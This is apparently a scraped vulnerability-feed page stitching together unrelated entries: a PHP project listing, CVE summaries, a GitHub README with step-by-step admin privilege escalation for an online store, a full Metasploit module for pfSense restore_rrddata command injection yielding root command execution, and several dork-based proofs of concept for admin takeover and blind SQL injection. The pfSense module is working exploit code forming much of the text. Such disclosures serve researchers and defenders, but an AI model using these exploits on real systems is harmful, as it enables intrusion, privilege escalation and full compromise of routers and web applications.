A cross-site scripting (XSS) vulnerability in Teacher Subject Allocation System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Search text box.

“Teacher Subject Allocation Management System” is web-based application system that helps to allocate subjects to the teachers. In Teacher Subject Allocation Management System educational administrators allocate different subjects to the teacher and teacher check that allotment by their employee id and Name.

**Project Requirements**

Project Name

Teacher Subject Allocation Management System in PHP

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In this project, we use PHP and  **MySQL** database. It has one module i.e  Admin

**Admin Module**

1.  Admin is the super user of the website who can manage everything on the website. Admin can log in through the login page
2.  **Dashboard**: In this section, admin can see all detail in brief like the total course, total subjects and total teachers.
3.  **Course:** In this section, admin can manage the course (add/update/delete).
4.  **Subject:** In this section, admin can manage the subject (add/update/delete).
5.  **Teacher:** In this section, admin can manage the teacher (add/update).
6.  **Subject Allocation:** In this section, the admin can allocate subjects to their teachers.
7.  **Search:** In this section, admin can search uploaded details of subject allotment
8.  Admin can also update his profile, change the password and recover the password. 

**Brief of Home Page**

It is home page of **_“Teacher Subject Allocation Management System”_** on this teacher can view allotment of subject by the help of their employee id.

****Some of the Project Screens****

**Home Page**

**Admin Login**

**Admin Dashboard**

**Add Subject**

**Add Teacher**

**How to run the Teacher Subject Allocation System Project using PHP and MySQL**

1\. Download the project zip file

2\. Extract the file and copy tsas  folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/Html)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name  tsasdb

6\. Import tsasdb.sql file(given inside the zip package in SQL file folder)

7\. Run the script http://localhost/tsas

**Admin Credential**  
**Username:** admin  
**Password:** Test@123

**View Demo**

Download Source Code (TSAS Project PHP)

Size: 16 MB

Version: V 1.0

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2023-37743: Teacher Subject Allocation Management System in PHP | Teacher Subject Allocation Management Project

Sourcecodester Online Computer and Laptop Store 1.0 is vulnerable to Incorrect Access Control, which allows remote attackers to elevate privileges to the administrator's role.

main

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

d34dun1c02n Update README.md

c7145a6

Jul 12, 2023

Update README.md

c7145a6

**Git stats**

*   **5** commits

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

README.md

Update README.md

July 12, 2023 19:24

**README.md**

**CVE-2023-31704**

\[description\] Sourcecodester Online Computer and Laptop Store 1.0 is vulnerable to Incorrect Access Control, which allows remote attackers to elevate privileges to the administrator's role.

\[Vulnerability Type\] Incorrect Access Control

\[Vendor of Product\] Sourcecodster

\[Affected Product Code Base\] Online Computer and Laptop Store - 1.0

\[Affected Component\] https://php-ocls/classes/Users.php?f=save

\[Attack Type\] Remote

\[Impact Escalation of Privileges\] true

\[CVE Impact Other\] All administrative functions are exposed allowing an attacker to modify the site. This includes modification of purchase prices for products and direct modification of the site itself to include

\[Attack Vectors\]

1.  Log in as the administrator using the default credentials (Username: admin & Password: admin&123) at http://localhost/php-ocls/admin/login.php
2.  In the upper right-hand corner, click on the drop-down labeled "Administrator Admin" and select "My Account"
3.  Make sure the intercepting proxy is capturing, type "test" into the field labeled "Password" and press the update button in the lower left-hand corner of the page.
4.  Capture the request made to https://php-ocls/classes/Users.php?f=save
5.  Log out of the administrative account
6.  Review the captured POST request to /php-ocls/classes/Users.php?f=save, find the input "test" in the message body, and change the string to "compromised"
7.  Return to http://localhost/php-ocls/admin/login.php and log in using the "admin" username and the new admin password "compromised"

\[Reference\] https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip

\[Discoverer\] William David Mathisen (d34dun1c02n)

CVE-2023-31704: GitHub - d34dun1c02n/CVE-2023-31704

A Reflected Cross-site scripting (XSS) vulnerability in Sourcecodester Task Reminder System 1.0 allows an authenticated user to inject malicious javascript into the page parameter.

**🍪 Privacy & Transparency**

We and our partners use cookies to Store and/or access information on a device. We and our partners use data for Personalised ads and content, ad and content measurement, audience insights and product development. An example of data being processed may be a unique identifier stored in a cookie. Some of our partners may process your data as a part of their legitimate business interest without asking for consent. To view the purposes they believe they have legitimate interest for, or to object to this data processing use the vendor list link below. The consent submitted will only be used for data processing originating from this website. If you would like to change your settings or withdraw consent at any time, the link to do so is in our privacy policy accessible from our home page..

CVE-2023-31705: Downloading Task Reminder System in PHP and MySQL Source Code Free Download?cve=title Code

This Metasploit module exploits an authenticated command injection vulnerability in the "restore_rrddata()" function of pfSense prior to version 2.7.0 which allows an authenticated attacker with the "WebCfg - Diagnostics: Backup and Restore" privilege to execute arbitrary operating system commands as the "root" user. This module has been tested successfully on version 2.6.0-RELEASE.

    class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'pfSense Restore RRD Data Command Injection',        'Description' => %q{          This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of          pfSense prior to version 2.7.0 which allows an authenticated attacker with the  "WebCfg - Diagnostics: Backup & Restore"          privilege to execute arbitrary operating system commands as the "root" user.          This module has been tested successfully on version 2.6.0-RELEASE.        },        'License' => MSF_LICENSE,        'Author' => [          'Emir Polat', # vulnerability discovery & metasploit module        ],        'References' => [          ['CVE', '2023-27253'],          ['URL', 'https://redmine.pfsense.org/issues/13935'],          ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94']        ],        'DisclosureDate' => '2023-03-18',        'Platform' => ['unix'],        'Arch' => [ ARCH_CMD ],        'Privileged' => true,        'Targets' => [          [ 'Automatic Target', {}]        ],        'Payload' => {          'BadChars' => "\x2F\x27",          'Compat' =>            {              'PayloadType' => 'cmd',              'RequiredCmd' => 'generic netcat'            }        },        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]        }      )    )    register_options [      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense'])    ]  end  def check    unless login      return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!")    end    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),      'method' => 'GET',      'keep_cookies' => true    )    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200    unless res&.body&.include?('Diagnostics: ')      return Exploit::CheckCode::Safe('Vulnerable module not reachable')    end    version = detect_version    unless version      return Exploit::CheckCode::Detected('Unable to get the pfSense version')    end    unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE')      return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected")    end    Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!")  end  def login    # Skip the login process if we are already logged in.    return true if @logged_in    csrf = get_csrf('index.php', 'GET')    unless csrf      print_error('Could not get the expected CSRF token for index.php when attempting login!')      return false    end    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'POST',      'vars_post' => {        '__csrf_magic' => csrf,        'usernamefld' => datastore['USERNAME'],        'passwordfld' => datastore['PASSWORD'],        'login' => ''      },      'keep_cookies' => true    )    if res && res.code == 302      @logged_in = true      true    else      false    end  end  def detect_version    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET',      'keep_cookies' => true    )    # If the response isn't a 200 ok response or is an empty response, just return nil.    unless res && res.code == 200 && res.body      return nil    end    if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil?      nil    else      version    end  end  def get_csrf(uri, methods)    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, uri),      'method' => methods,      'keep_cookies' => true    )    unless res && res.body      return nil # If no response was returned or an empty response was returned, then return nil.    end    # Try regex match the response body and save the match into a variable named csrf.    if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil?      return nil # No match could be found, so the variable csrf won't be defined.    else      return csrf    end  end  def drop_config    csrf = get_csrf('diag_backup.php', 'GET')    unless csrf      fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!')    end    post_data = Rex::MIME::Message.new    post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')    post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')    post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"')    post_data.add_part('', nil, nil, 'form-data; name="restorearea"')    post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"')    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),      'method' => 'POST',      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'data' => post_data.to_s,      'keep_cookies' => true    )    if res && res.code == 200 && res.body =~ /<rrddatafile>/      return res.body    else      return nil    end  end  def exploit    unless login      fail_with(Failure::NoAccess, 'Could not obtain the login cookies!')    end    csrf = get_csrf('diag_backup.php', 'GET')    unless csrf      fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!')    end    config_data = drop_config    if config_data.nil?      fail_with(Failure::UnexpectedReply, 'The drop config response was empty!')    end    if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil?      fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!')    end    config_data.gsub!(' ', '${IFS}')    send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};")    post_data = Rex::MIME::Message.new    post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')    post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')    post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"')    post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"')    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')    post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"')    post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"")    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')    post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),      'method' => 'POST',      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'data' => post_data.to_s,      'keep_cookies' => true    )    if res      print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.")    end  endend

pfSense Restore RRD Data Command Injection

BloodBank version 1.0 suffers from an insecure direct object reference vulnerability.

    ======================================================================================================================================| # Title     : BloodBank v1.0 - Blood Donor Directory CMS with PayPal Integration unauthorized administrative access Vulnerability  || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/bloodbank-blood-donor-directory-cms-with-paypal-integration/21188267                     |  | # Dork      : n/a                                                                                                                  |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /admin/subscriber-csv.php[+]  http://127.0.0.1/demosly.om/xicia/cc/bloodbank/admin/subscriber-csv.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BloodBank 1.0 Insecure Direct Object Reference

Bloly version 1.3 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : Bloly v1.3 Add admin Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.bloly.com/download.php                                                                                  || # Dork      : Bloly v1.3 by SoftCab Inc                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload to add new admin login : /blog/install.php .[+] http://127.0.0.1/www/grupomedbrasilcom.br/blog/install.php   ( add new admin login )[+] http://127.0.0.1/www/grupomedbrasil.combr/blog/index.php?action=3   ( Login from Her )Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Bloly 1.3 Add Administrator

BKMobile CMS version 1.5.0 suffers from a remote blind SQL injection vulnerability.

    ====================================================================================================================================| # Title     : BKMobile-CMS V1.5.0 Blind SQL Injection Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://bekustom.com/                                                                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine[+] http://127.0.0.1/BKMobileCMS/user/full_blog_summary.php?blog_id= <=====| inject Her[+] http://127.0.0.1/BKMobileCMS/admin/ = loginGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BKMobile CMS 1.5.0 SQL Injection

Blogator Script version 0.93 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Blogator script v 0.93 Reinstall default Password Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.blogator.net/                                                                                           |  | # Dork      : Weblogs par Blogator-script www.blogator-script.com © 2006 SAMTEK - Blogator                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : /bs_auth.php = default pass is admin[+] http://127.0.0.1/courir33net/group33/blog/bs_auth.php = default pass is adminGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Blogator Script 0.93 Insecure Settings

A vulnerability was found in Campcodes Retro Cellphone Online Store 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/add_user_modal.php. The manipulation of the argument un leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-234014 is the identifier assigned to this vulnerability.

CVE-2023-3660

A vulnerability was found in SourceCodester AC Repair and Services System 1.0. It has been classified as critical. This affects an unknown part of the file /classes/Master.php?f=save_inquiry. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-234015.

Tag

#php